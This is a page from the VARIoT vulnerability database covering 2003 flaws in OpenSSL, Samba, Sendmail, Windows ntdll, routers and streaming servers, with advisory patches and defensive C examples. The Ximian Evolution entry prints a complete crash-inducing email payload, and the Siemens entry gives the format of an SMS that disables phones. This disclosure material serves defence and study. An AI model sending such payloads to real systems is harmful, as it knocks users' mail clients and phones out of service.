VARIoT IoT vulnerabilities database


VAR-200303-0128 No CVE 3Com SuperStack II RAS 1500 Unauthorized Remote Access Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The 3Com SuperStack II Remote Access System 1500 is a device that connects to telecommunications equipment over BRI-ISDN/analog lines. Some files on the 3Com SuperStack II Remote Access System can be accessed without authorization, and remote attackers can use this to obtain sensitive information about the device. The RAS 1500 protects only the download.htm file (the download manager for configuration files and system software) with HTTP Basic authentication; the system image files and configuration files themselves have no protection, so an attacker can retrieve them without authorization and extract sensitive information from them. Specifically, RAS 1500 devices fail to carry out authentication when requests are made for various files that may contain sensitive information
VAR-200303-0127 No CVE 3Com SuperStack II RAS 1500 Malicious IP Header Remote Denial of Service Attack Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The 3com SuperStack II Remote Access System 1500 is a device that accesses telecommunications equipment through BRI-ISDN/analog lines. The 3com SuperStack II remote access system handles malformed packets incorrectly, and remote attackers can exploit this vulnerability to perform denial of service attacks on devices. The attacker sends a packet with the IP option length field set to zero to the RAS 1500 system, which can cause the device to reboot and disconnect all connections. A vulnerability has been reported in the 3Com SuperStack II RAS 1500 router. The problem occurs when processing network packets containing malicious IP headers. When received, the packet may cause the router to crash
VAR-200312-0205 CVE-2003-1104 IBM Tivoli Firewall Toolbox contains vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Buffer overflow in IBM Tivoli Firewall Toolbox (TFST) 1.2 allows remote attackers to execute arbitrary code via unknown vectors. A vulnerability in the Tivoli Firewall Toolbox version 1.2 has been discovered that can lead to remote unauthorized compromise of the environment within the firewall system. The problem exists because the Firewall Security Toolbox relay daemon fails to perform adequate bounds checking on received data. The relay daemon included in TFST listens on a TCP socket; when it stores data received from a Tivoli node into a memory buffer it performs no bounds check. A forged Tivoli node that sends a large amount of data can therefore overflow a buffer in the relay daemon, overwriting control data on the stack and causing arbitrary instructions to be executed with the privileges of the relay process. On Unix platforms the daemon generally runs as the 'nobody' user
VAR-200303-0118 CVE-2003-0131 SSL/TLS implementations disclose side channel information via PKCS #1 v1.5 version number extension

Related entries in the VARIoT exploits database: VAR-E-200303-0183
CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
The SSL and TLS components for OpenSSL 0.9.6i and earlier, 0.9.7, and 0.9.7a allow remote attackers to perform an unauthorized RSA private key operation via a modified Bleichenbacher attack that uses a large number of SSL or TLS connections using PKCS #1 v1.5 padding that cause OpenSSL to leak information regarding the relationship between ciphertext and the associated plaintext, aka the "Klima-Pokorny-Rosa attack." SSL/TLS implementations that respond distinctively to an incorrect PKCS #1 v1.5 encoded SSL/TLS version number expose the premaster secret to a modified Bleichenbacher attack. An attacker could decrypt a given SSL/TLS session or forge a signature on behalf of a vulnerable application's private RSA key. When OpenSSL uses RSA for key exchange, inadequate handling of the version number embedded in the PKCS #1 padded premaster secret leaks information about the secret value shared between client and server for the session, which may allow the encrypted communication to be decrypted. A user could abuse the response of vulnerable servers as an oracle: by sending a large number of adaptively chosen ciphertexts, a remote attacker can obtain the result of a private-key operation on a ciphertext of their choice without learning the key itself.

OpenSSL Security Advisory [19 March 2003]
Klima-Pokorny-Rosa attack on RSA in SSL/TLS
===========================================
Czech cryptologists Vlastimil Klima, Ondrej Pokorny, and Tomas Rosa have come up with an extension of the "Bleichenbacher attack" on RSA with PKCS #1 v1.5 padding as used in SSL 3.0 and TLS 1.0. Note that the server's RSA key is not compromised in this attack. OpenSSL releases up to 0.9.6i and 0.9.7a are vulnerable. The enclosed patch modifies SSL/TLS server behaviour to avoid the vulnerability.

Security Patch
--------------
The following patch can be applied to OpenSSL releases 0.9.6b up to 0.9.6i, 0.9.7, and 0.9.7a.
--- s3_srvr.c 29 Nov 2002 11:31:51 -0000 1.85.2.14 +++ s3_srvr.c 19 Mar 2003 18:00:00 -0000 @@ -1447,7 +1447,7 @@ if (i != SSL_MAX_MASTER_KEY_LENGTH) { al=SSL_AD_DECODE_ERROR; - SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_RSA_DECRYPT); + /* SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_RSA_DECRYPT); */ } if ((al == -1) && !((p[0] == (s->client_version>>8)) && (p[1] == (s->client_version & 0xff)))) 
@@ -1463,30 +1463,29 @@ (p[0] == (s->version>>8)) && (p[1] == (s->version & 0xff)))) { al=SSL_AD_DECODE_ERROR; - SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_PROTOCOL_VERSION_NUMBER); - goto f_err; + /* SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_PROTOCOL_VERSION_NUMBER); */ + + /* The Klima-Pokorny-Rosa extension of Bleichenbacher's attack + * (https://eprint.iacr.org/2003/052/) exploits the version + * number check as a "bad version oracle" -- an alert would + * reveal that the plaintext corresponding to some ciphertext + * made up by the adversary is properly formatted except + * that the version number is wrong. To avoid such attacks, + * we should treat this just like any other decryption error. */ + p[0] = (char)(int) "CAN-2003-0131 patch 2003-03-19"; } } if (al != -1) { -#if 0 - goto f_err; -#else /* Some decryption failure -- use random value instead as countermeasure * against Bleichenbacher's attack on PKCS #1 v1.5 RSA padding - * (see RFC 2246, section 7.4.7.1). - * But note that due to length and protocol version checking, the - * attack is impractical anyway (see section 5 in D. Bleichenbacher: - * "Chosen Ciphertext Attacks Against Protocols Based on the RSA - * Encryption Standard PKCS #1", CRYPTO '98, LNCS 1462, pp. 1-12). - */ + * (see RFC 2246, section 7.4.7.1). */ ERR_clear_error(); i = SSL_MAX_MASTER_KEY_LENGTH; p[0] = s->client_version >> 8; p[1] = s->client_version & 0xff; RAND_pseudo_bytes(p+2, i-2); /* should be RAND_bytes, but we cannot work around a failure */ -#endif } s->session->master_key_length= References ---------- Report "Attacking RSA-based Sessions in SSL/TLS" by V. Klima, O. Pokorny, and T. Rosa: https://eprint.iacr.org/2003/052/ The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0131 to this issue. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0131 URL for this Security Advisory: https://www.openssl.org/news/secadv_20030319.txt
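Review bot: in the first hunk (@@ -1447), commenting out `SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_RSA_DECRYPT);` while keeping `al=SSL_AD_DECODE_ERROR;` does not change observable behaviour: that branch has no `goto f_err`, so it already fell through to the `al != -1` block, which calls `ERR_clear_error()` and discards any queued error. The behavioural fix is the removal of `goto f_err` in the second hunk. Delete the call outright rather than leaving it behind as a comment, or keep it and rely on `ERR_clear_error()`, but not both.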
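Review bot: in the second hunk (@@ -1463), `p[0] = (char)(int) "CAN-2003-0131 patch 2003-03-19";` stores the low byte of a string literal's address into p[0]; the pointer-to-int conversion is implementation-defined and warns wherever pointers are wider than int, and the value is dead because the `al != -1` block that follows immediately overwrites it with `p[0] = s->client_version >> 8;`. If the purpose is a marker that is visible in the built binary, put the literal in a `static const char` object instead of executing a meaningless store. Note also that after this hunk the success path only copies the decrypted bytes while every failure path calls `RAND_pseudo_bytes(p+2, i-2)`, so the two outcomes still do different amounts of work: the alert oracle is gone, a timing difference is not.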
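As an added example (not OpenSSL's code and not part of the advisory), the check the two hunks above change, written out in C over a block that has already been RSA-decrypted: vulnerable_get_premaster() answers differently to a padding failure and to a wrong version number, which is the "bad version oracle" the Klima-Pokorny-Rosa attack uses, while hardened_get_premaster() folds both into the random-premaster countermeasure of RFC 2246 section 7.4.7.1. The RSA step itself, the 1024-bit block size, the demo_rng generator (a stand-in for RAND_bytes) and the constructed premaster secrets are all assumptions of the example.

```c
#include <stdint.h>
#include <string.h>

#define PREMASTER_LEN 48
#define RSA_BLOCK_LEN 128   /* block size for an assumed 1024-bit modulus */

enum pms_result { PMS_OK = 0, PMS_BAD_PADDING = 1, PMS_BAD_VERSION = 2 };

/* EME-PKCS1-v1_5 type 2: 00 || 02 || PS (>= 8 non-zero bytes) || 00 || M.
 * Returns M (length via *mlen), or NULL if the padding is malformed. */
static const uint8_t *unpad_pkcs1_type2(const uint8_t *em, size_t emlen, size_t *mlen)
{
    size_t i;
    if (emlen < 11 || em[0] != 0x00 || em[1] != 0x02) return NULL;
    for (i = 2; i < emlen && em[i] != 0x00; i++) ;
    if (i == emlen || i - 2 < 8) return NULL;
    *mlen = emlen - i - 1;
    return em + i + 1;
}

/* Wrap a premaster secret in a correctly padded block (test input; a real
 * client would RSA-encrypt this block with the server's public key). */
int build_em_block(uint8_t *em, size_t emlen, const uint8_t *pms, size_t pmslen)
{
    size_t i, sep;
    if (emlen < pmslen + 11) return -1;
    sep = emlen - pmslen - 1;
    em[0] = 0x00; em[1] = 0x02;
    for (i = 2; i < sep; i++) em[i] = 0xAA;   /* any non-zero filler works */
    em[sep] = 0x00;
    memcpy(em + sep + 1, pms, pmslen);
    return 0;
}

/* Pre-patch logic: a padding/length failure and a version failure are
 * distinguishable. Telling PMS_BAD_VERSION from PMS_BAD_PADDING tells the
 * attacker the decrypted block was PKCS #1 conformant: the oracle the attack needs. */
enum pms_result vulnerable_get_premaster(const uint8_t *em, size_t emlen,
                                         uint16_t client_version, uint8_t out[PREMASTER_LEN])
{
    size_t mlen;
    const uint8_t *m = unpad_pkcs1_type2(em, emlen, &mlen);
    if (m == NULL || mlen != PREMASTER_LEN) return PMS_BAD_PADDING;
    if (m[0] != (client_version >> 8) || m[1] != (client_version & 0xff)) return PMS_BAD_VERSION;
    memcpy(out, m, PREMASTER_LEN);
    return PMS_OK;
}

/* Patched logic (RFC 2246 7.4.7.1): every failure, a wrong version number
 * included, is replaced by a random premaster secret carrying the expected
 * version bytes, so the handshake always continues and later fails at Finished. */
enum pms_result hardened_get_premaster(const uint8_t *em, size_t emlen,
                                       uint16_t client_version, uint8_t out[PREMASTER_LEN],
                                       void (*rng)(uint8_t *, size_t))
{
    size_t mlen;
    const uint8_t *m = unpad_pkcs1_type2(em, emlen, &mlen);
    int ok = m != NULL && mlen == PREMASTER_LEN &&
             m[0] == (client_version >> 8) && m[1] == (client_version & 0xff);
    if (ok) {
        memcpy(out, m, PREMASTER_LEN);
    } else {
        out[0] = (uint8_t)(client_version >> 8);
        out[1] = (uint8_t)(client_version & 0xff);
        rng(out + 2, PREMASTER_LEN - 2);
    }
    return PMS_OK;
}

/* Deterministic stand-in for RAND_bytes so the example runs offline; not a CSPRNG. */
static void demo_rng(uint8_t *buf, size_t n)
{
    static uint32_t x = 0x9E3779B9u;
    size_t i;
    for (i = 0; i < n; i++) {
        x ^= x << 13; x ^= x >> 17; x ^= x << 5;
        buf[i] = (uint8_t)x;
    }
}

/* Constructed TLS 1.0 (0x0301) scenarios: 0 = well-formed, 1 = well-formed but
 * version 0x0300, 2 = padding broken (second byte not 0x02). out[] is zeroed first. */
enum pms_result demo_case(int scenario, int hardened, uint8_t out[PREMASTER_LEN])
{
    uint8_t pms[PREMASTER_LEN], em[RSA_BLOCK_LEN];
    memset(pms, 0x42, sizeof pms);             /* constructed premaster secret */
    pms[0] = 0x03;
    pms[1] = (scenario == 1) ? 0x00 : 0x01;
    build_em_block(em, sizeof em, pms, sizeof pms);
    if (scenario == 2) em[1] = 0x01;
    memset(out, 0, PREMASTER_LEN);
    return hardened ? hardened_get_premaster(em, sizeof em, 0x0301, out, demo_rng)
                    : vulnerable_get_premaster(em, sizeof em, 0x0301, out);
}

/* Wrappers: the result code, and whether out[] begins with the 03 01 version bytes. */
enum pms_result demo_result(int scenario, int hardened)
{ uint8_t out[PREMASTER_LEN]; return demo_case(scenario, hardened, out); }
int demo_prefix_ok(int scenario, int hardened)
{ uint8_t out[PREMASTER_LEN]; demo_case(scenario, hardened, out); return out[0] == 0x03 && out[1] == 0x01; }
```

With the vulnerable function, scenario 1 (correct padding, wrong version) and scenario 2 (broken padding) yield different codes, which is all an adaptive attacker needs; with the hardened function both yield PMS_OK and a version-prefixed random secret, so the only remaining failure is the Finished MAC mismatch. The example does not address the timing difference between the copy path and the random-fill path; that is a separate concern from the alert oracle.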
VAR-200303-0113 CVE-2003-0126 SOHO Routefinder Permission permission vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
The web interface for SOHO Routefinder 550 firmware 4.63 and earlier, and possibly later versions, has a default "admin" account with a blank password, which could allow attackers on the LAN side to conduct unauthorized activities. RouteFinder 550 VPN is prone to a remote security vulnerability
VAR-200303-0123 No CVE CNVD-2003-0765 CVSS V2: -
CVSS V3: -
Severity: MEDIUM
Ximian Evolution is an integrated personal information management solution for the Linux platform. A denial of service vulnerability exists in the Ximian Evolution mail user agent 1.2.2 and earlier. A remote attacker sends a message whose body has been uuencoded multiple times; Evolution tries to allocate a large amount of memory until it crashes. A body uuencoded three times may crash the system through resource exhaustion.

Test code (the message as published; it was posted quoted-printable encoded, so "=3D" is shown decoded as "="):

From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; Boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: Inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit

begin 600 phase2
M8F5G:6X@-CP('!H87-E,0I-.$8U1SHV6$ M0R!0 *"<Q13XG,"HS,RA&+310 M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C M138W- 3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20M7#%#,2 *32\D.% 4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC M(%0K,S!(+$(Q(2A$(2DQ4TTR* #1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ -,3-!-RTU*%HM4R4Y"C,J5#A- ?,U-,4#(B2$(P*B! (D(@*CDV640B0" @"B *96YD"@
end
--=-mTDu5zdJIsixETTwCF5Y--

Patching: install the upgrade packages.
Red Hat Linux 8.0: evolution-1.0.8-11.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/evolution-1.0.8-11.i386.rpm
Red Hat Linux 7.3: evolution-1.0.8-9.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/evolution-1.0.8-9.7x.i386.rpm
Red Hat Linux 7.3: gal-0.19.2-3.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/gal-0.19.2-3.7x.i386.rpm
Red Hat Linux 7.3: gal-devel-0.19.2-3.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/gal-devel-0.19.2-3.7x.i386.rpm
Red Hat Linux 7.3: libgal19-0.19.2-3.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/libgal19-0.19.2-3.7x.i386.rpm
Ximian: upgrade to version 1.2.3: http://www.ximian.com/products/ximian_evolution/
VAR-200305-0049 CVE-2003-0201 Samba contains multiple buffer overflows CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code. Samba contains several buffer overflow vulnerabilities. An updated version has been released. ------------ This vulnerability information summarises multiple vulnerabilities released at the same time; note that it covers vulnerabilities other than the one named in the title. ------------ In Samba 2.2.8 and earlier, a buffer overflow exists in the StrnCpy() call in smbd/trans2.c when handling files with very long names. In the call StrnCpy(fname,pname,namelen), the destination fname is a pstring (a 1024-byte char array) while namelen is taken from the request; supplying a pname longer than 1024 bytes therefore overflows fname and overwrites adjacent memory. (CAN-2003-0201) In addition, three further potential buffer overflows stemming from the same issue have been found by the vendor (CAN-2003-0196); Samba 2.2.8a corrects all of them. Details of CAN-2003-0196 are not yet public. Please refer to the "Overview" for the impact of this vulnerability. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory. Samba-TNG 0.3.1 and earlier are also affected
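The unchecked copy in C, as an added example that is not Samba's code: strn_cpy() mirrors the StrnCpy() semantics this entry describes (copy up to n bytes, NUL-terminate, trust n completely), and copy_name_bounded() is one way to guard it by checking the request-supplied length against the real size of the pstring before copying. The request name and its claimed length are constructed for the demonstration, and the actual 2.2.8a fix is not reproduced here.

```c
#include <string.h>

#define PSTRING_LEN 1024
typedef char pstring[PSTRING_LEN];

/* The StrnCpy() semantics the entry describes: copy up to n bytes of src and
 * always NUL-terminate. It trusts n completely; called as
 * StrnCpy(fname, pname, namelen) with a 1024-byte pstring and a namelen
 * taken from the request, any n > 1023 writes past fname (the CAN-2003-0201
 * condition). It is therefore never called here with an unchecked n. */
static char *strn_cpy(char *dest, const char *src, size_t n)
{
    size_t i;
    for (i = 0; i < n && src[i] != '\0'; i++) dest[i] = src[i];
    dest[i] = '\0';
    return dest;
}

/* Bounded replacement: dest_size is the real capacity of dest, n the
 * request-supplied length. Returns 0 on success, -1 if the name cannot fit.
 * Rejecting (rather than silently truncating) matters because a truncated
 * name would open a different file than the one the client asked for. */
int copy_name_bounded(char *dest, size_t dest_size, const char *src, size_t n)
{
    if (dest_size == 0 || n > dest_size - 1) return -1;
    strn_cpy(dest, src, n);
    return 0;
}

/* Constructed trans2open-style request whose name is 4095 'A's with a claimed
 * length of `namelen`. Returns strlen(fname) after the copy, or -1 if rejected. */
int demo_trans2open_name(size_t namelen)
{
    static char request_name[4096];
    pstring fname;
    memset(request_name, 'A', sizeof request_name - 1);
    request_name[sizeof request_name - 1] = '\0';
    if (copy_name_bounded(fname, sizeof fname, request_name, namelen) != 0) return -1;
    return (int)strlen(fname);
}
```

A claimed length of 1023 is the largest that fits a pstring with its terminator; 1024 and above are refused before any byte is copied, which is the check the vulnerable call lacked.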
VAR-200303-0063 CVE-2003-0109 Buffer Overflow in Core Microsoft Windows DLL CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0. This vulnerability, which is being actively exploited on WebDAV-enabled IIS 5.0 servers, will allow a remote attacker to execute arbitrary code on unpatched systems. Sites running Microsoft Windows should apply a patch or disable WebDAV services as soon as possible. The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface. Windows XP also does not include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances. ** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks. ** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function. ** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability
VAR-200303-0010 CVE-2003-0147 OpenSSL Timing Attack RSA Private Key Information Disclosure Vulnerability

Related entries in the VARIoT exploits database: VAR-E-200303-0184
CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
OpenSSL does not use RSA blinding by default, which allows local and remote attackers to obtain the server's private key by determining factors using timing differences on (1) the number of extra reductions during Montgomery reduction, and (2) the use of different integer multiplication algorithms ("Karatsuba" and normal). Cryptographic libraries and applications do not provide adequate defense against a side-channel timing attack against RSA private keys. Such an attack has been shown to be practical using currently available hardware on systems and networks with sufficiently low variance in latency. When OpenSSL uses RSA, the private-key operation is subject to a timing attack: by measuring and analysing the time the server takes to perform RSA decryption, an attacker can recover the private key. The server's private key may be obtained. A side-channel attack on the OpenSSL implementation has been published in a recent paper that may ultimately result in an active adversary gaining the RSA private key of a target server. The attack involves analysis of the timing of certain operations during client-server session key negotiation
VAR-200303-0112 CVE-2003-0125 Multitech RouteFinder Remote Memory Corruption Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Buffer overflow in the web interface for SOHO Routefinder 550 before firmware 4.63 allows remote attackers to cause a denial of service (reboot) and execute arbitrary code via a long GET /OPTIONS value. A vulnerability has been discovered in Multitech RouteFinder 550 VPN firmware release 4.63 and earlier. The problem occurs due to insufficient bounds checking of data supplied in HTTP GET requests. By passing excessive data to the device it may be possible for a remote attacker to corrupt memory. Successful exploitation of this bug may result in a denial of service, causing the device to crash. Although it has not been confirmed, it may also be possible for an attacker to exploit this issue to execute arbitrary commands
VAR-200303-0124 No CVE SMS Denial of Service Vulnerability on All Siemens 35 and 45 Series Mobile Phones CVSS V2: -
CVSS V3: -
Severity: -
Siemens *35 and *45 series mobile phones support SMS. These phones have a vulnerability in the handling of specially crafted text messages that remote attackers can use to conduct denial of service attacks against the phone. The attacker sends a message of the form "%String" to a *35 or *45 series phone; this causes *35 phones to stop working and *45 series phones to take about 2 minutes to read the message. The hostile characters must be upper-case and the message must be enclosed in quotation marks. After receiving 10 to 15 such messages the phone may drain its battery. A similar local variant also exists: messages of the form "%some_word" (lower-case characters) can cause the same problems.
VAR-200303-0126 No CVE HP JetDirect Printer SNMP JetAdmin Device Password Disclosure Vulnerability CVSS V2: 2.1
CVSS V3: -
Severity: LOW
The JetDirect printer is a printer with integrated network capabilities developed by Hewlett Packard. The HP JetDirect printer does not properly handle certain SNMP GET requests, which can be exploited by remote attackers to obtain printer device passwords and change printer settings. The attacker sends a special SNMP GET request to a printer with this vulnerability, and the printer returns the device password in hexadecimal to the requester, which allows the remote user to access and change the printer's configuration settings. This vulnerability is different from the "HP JetDirect Printer SNMP GET Get Administrator Password Remote Vulnerability" ( http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=3172 ): the requested OID is different. It has been reported that HP JetDirect printers leak the web JetAdmin device password under some circumstances
VAR-200303-0122 CVE-2002-1337 Remote Buffer Overflow in Sendmail

Related entries in the VARIoT exploits database: VAR-E-200303-0035, VAR-E-200303-0036
CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Buffer overflow in Sendmail 5.79 to 8.12.7 allows remote attackers to execute arbitrary code via certain formatted address fields, related to sender and recipient header comments as processed by the crackaddr function of headers.c. A buffer overflow vulnerability was discovered in sendmail's message processing. The vulnerability could allow a third party to gain administrative privileges remotely. The problem is triggered when sendmail receives a message with maliciously constructed header information. Because of this, a sendmail installation on a host inside a LAN may be affected even when another MTA (Mail Transfer Agent) relays the malicious message to it. A third party may be able to remotely obtain administrator privileges. Sendmail is prone to a remote buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers. Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid. Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree. Most organizations have various mail transfer agents (MTAs) at various locations within their network, at least one of which is directly connected to the Internet. According to statistics, Internet mail traffic handled by Sendmail accounts for 50% to 75% of the total. Many UNIX and Linux workstations run Sendmail by default. When an email header contains an address or address list (e.g. "From", "To", "CC"), Sendmail attempts to check whether the supplied address or address list is valid. Sendmail does this using the crackaddr() function, located in the headers.c file in the Sendmail source tree, which copies the parsed address into a fixed-size buffer. Sendmail will check this buffer and stop adding data to it if it is found to be full.
Sendmail goes through several safety checks to ensure that characters are interpreted correctly. On most Unix or Linux systems, Sendmail runs as the root user. Because the attack code can be included in what appears to be a normal email message, it can easily pass through many common packet filtering devices or firewalls without being detected. Successful exploitation of an unpatched sendmail system leaves no messages in the syslog. On patched systems, however, attempts to exploit this vulnerability leave the following log message: Dropped invalid comments from header address. This vulnerability affects both the commercial and open source versions of Sendmail, and is also reported to have been successfully exploited in a lab environment
VAR-200302-0050 No CVE USRobotics Broadband Router GET Request Remote Denial of Service Attack Vulnerability CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
US Robotics offers a wide range of broadband router devices, including the US Robotics Broadband-Router 8000A/8000-2 (USR848000A-02). The US Robotics 8000A/8000-2 broadband router lacks proper handling of long GET requests, and remote attackers can exploit this vulnerability to perform denial of service attacks on routers. The US Robotics 8000A/8000-2 broadband router includes an embedded WEB service program. Due to the lack of proper handling of long GET requests, an attacker submitting a long malicious input can cause the device to crash and generate a denial of service attack. USRobotics Broadband-Routers are reportedly prone to denial of service attacks. An attacker can exploit this vulnerability by issuing an overly long GET request to the embedded web server of a vulnerable USRobotics device. When the device attempts to process the malformed input, it will crash. It has been reported that this condition may be reproduced from within the internal network. This condition may be due to a buffer overflow. This issue is reported to affect v2.5 of US Robotics Broadband-Router 8000A/8000-2 (USR848000A-02)
VAR-200302-0055 No CVE Axis Communications Video Server Command.CGI File Creation Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.
VAR-200312-0380 CVE-2003-1413 Apple QuickTime/Darwin Streaming Server Remote file leak vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
parse_xml.cgi in Apple Darwin Streaming Server 4.1.1 allows remote attackers to determine the existence of arbitrary files by using ".." sequences in the filename parameter and comparing the resulting error messages. It has been reported that the QuickTime/Darwin Streaming Server reveals information that may be sensitive. When certain requests are made, a difference in responses could make it possible for an attacker to gain information about the local host. There is a vulnerability in parse_xml.cgi of Apple Darwin Streaming Server 4.1.1
VAR-200312-0381 CVE-2003-1414 Apple QuickTime/Darwin Streaming Server parse_xml.cgi File leak vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Directory traversal vulnerability in parse_xml.cgi in Apple Darwin Streaming Server 4.1.2 and Apple QuickTime Streaming Server 4.1.1 allows remote attackers to read arbitrary files via a ... (triple dot) in the filename parameter. The vulnerability exists due to insufficient sanitization of some parameters given to the parse_xml.cgi script. Information obtained in this manner may be used by an attacker to launch more organized attacks against a vulnerable system. This vulnerability was tested on SS for Microsoft Windows systems. Remote attackers can read arbitrary files with the help of the ..
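One lexical check for the filename parameter discussed in this entry and the previous one, as an added example in C rather than the CGI's Perl (not Apple's code): is_safe_filename() rejects path separators of both flavours and any component made only of dots, which covers ".." as well as the "..." form this entry reports, and build_media_path() joins an accepted name onto a fixed media root so the request can never name anything outside it. The root "/srv/movies" and the request names are assumptions of the example.

```c
#include <string.h>

#define MAX_NAME 255

/* 1 if `name` is one safe path component, 0 otherwise. Rejects an empty or
 * over-long name, any '/' or '\\' (so both Unix and Windows separators), NUL
 * and control characters, and a component made only of dots: ".", "..", and
 * the "..." form that Windows path handling collapses like "..". Dots inside
 * a name ("a..b.mov") remain allowed. */
int is_safe_filename(const char *name)
{
    size_t i, n = strlen(name);
    int all_dots = 1;
    if (n == 0 || n > MAX_NAME) return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '/' || c == '\\' || c < 0x20 || c == 0x7f) return 0;
        if (c != '.') all_dots = 0;
    }
    return !all_dots;
}

/* Join a validated name onto a fixed root. Returns 0 and fills out[], or -1
 * (out[] untouched) when the name is unsafe or the result would not fit. */
int build_media_path(char *out, size_t outsz, const char *root, const char *name)
{
    size_t rl = strlen(root), nl = strlen(name);
    if (!is_safe_filename(name) || rl + 1 + nl + 1 > outsz) return -1;
    memcpy(out, root, rl);
    out[rl] = '/';
    memcpy(out + rl + 1, name, nl + 1);          /* includes the NUL */
    return 0;
}

/* Constructed check against an assumed media root: returns the length of the
 * joined path, or -1 if the request name was rejected. */
int demo_media_path_len(const char *name)
{
    char path[512];
    if (build_media_path(path, sizeof path, "/srv/movies", name) != 0) return -1;
    return (int)strlen(path);
}
```

Because the check is purely lexical and allows a single component only, it does not need to canonicalise the path or consult the filesystem; a caller that must report failure to the client should do so with one fixed message, since the previous entry shows that differing error messages are themselves an oracle for file existence.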
VAR-200303-0102 CVE-2003-0055 Apple Quicktime/Darwin MP3 Broadcaster File name remote buffer overflow vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Buffer overflow in the MP3 broadcasting module of Apple Darwin Streaming Administration Server 4.1.2 and QuickTime Streaming Server 4.1.1 allows remote attackers to execute arbitrary code via a long filename. A vulnerability has been discovered in the Quicktime/Darwin MP3 Broadcaster. The problem occurs due to insufficient bounds checking on MP3 filenames. Processing an MP3 file with a name of excessive length may trigger the condition, effectively causing memory to be overwritten. This issue may be exploitable by a remote attacker to execute arbitrary commands with the privileges of the user running the vulnerable application. By default, these services listen on port 1220/TCP with root user privileges. A remote or local attacker could exploit this vulnerability to serve malicious MP3 files and trigger a buffer overflow. When the MP3 broadcast module processes MP3 files with file names exceeding 256 bytes, buffer overflow may occur
VAR-200303-0100 CVE-2003-0053 Apple QuickTime/Darwin Streaming Server Parse_XML.CGI Cross-Site Scripting Vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
